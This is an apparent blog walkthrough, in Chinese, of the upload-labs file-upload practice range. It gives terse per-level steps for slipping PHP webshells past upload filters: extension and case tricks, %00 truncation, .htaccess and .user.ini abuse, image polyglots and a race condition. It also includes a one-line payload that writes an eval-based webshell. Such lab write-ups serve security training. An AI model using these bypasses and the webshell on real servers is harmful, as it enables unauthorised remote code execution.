upload-labs靶场通关攻略

一。

1.将一个php文件重命名为jpg文件

2.将这个jpg文件上传然后抓包吧jpg改成php接着放行

3.鼠标右键图片在新建标签页打开图片后去蚁剑连接

1.上传jpg文件然后抓包把jpg改成php放行

2.图片右键新建标签页打开图片,复制图片地址去蚁剑连接

1.文件重命名为1.php5

2.

上传1.php5文件,图片右键新建标签页打开图片,复制图片地址去蚁剑连接

四。

1.创建一个.htaccess文件,里面输入内容

<FilesMatch "1.jpg">
SetHandler application/x-httpd-php</FilesMatch>

2.先上传.htaccess文件,再上传1.jpg,图片右键新建标签页打开图片

1.创建一个.user.ini文件,输入内容auto_prepend_file = "1.jpg"

2.先上传.user,ini文件,再上传1.jpg,访问http://127.0.0.1/upload/upload/readme.php

六。

1.上传1.php抓包,将1.php改为1.phP,放行

2.新标签页打开

七.

1.上传1.php抓包,将1.php后面加空格,放行

2.图片右键新建标签页打开图片

1.上传1.php抓包,将1.php后面加.,放行

2.

九.

1.上传1.php抓包,将1.php后面加::$DATA,放行

2.

1.上传1.php文件抓包,1.php后面加.空格. 放行

2.

十一

1.将1.php改为1.pphphp

2.

十二

1.

上传1.php文件抓包,将/upload/后面添加随便一个php文件%00,1.php改为1.jpg 放行

2.图片右键新建标签页打开图片,删掉�/9320240830163621.jpg访问

十三。

1,

上传1.php文件抓包,将/upload/后面添加随便一个php文件加空格,1.php改为1.jpg

2.打开Hex,将6.php后面的空格对应的20改为00,放行

3.删掉�/9320240830163621.jpg访问

十四

1.将一张图片和一个php文件放在cmd根目录,运行copy a.jpg/b+2.php/a shell.jpg

2.上传shell.jpg,图片右键新建标签页打开图片,打开文件包含漏洞,用file读取图片地址

十五.

1.上传shell.jpg,图片右键新建标签页打开图片,打开文件包含漏洞,用file读取图片地址

十六

环境问题跳过

十七

1.图片需要二次渲染,上传图片,图片右键新建标签页打开图片,打开文件包含漏洞,用file读取图片地址

十八。

1.php文件输入<?php fputs(fopen('webshell.php','w'),'<?php @eval($_POST["cmd"])?>');?>

2.上传文件,burp抓包,发送到 intruder 模块,设置⽆限发送空的payloads,无限重复;

3.同时攻击,直到出现webshell.php

4.

十九

1.上传php文件,保存名称改为1.php/.

2。图片右键新建标签页打开图片

  • 21
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值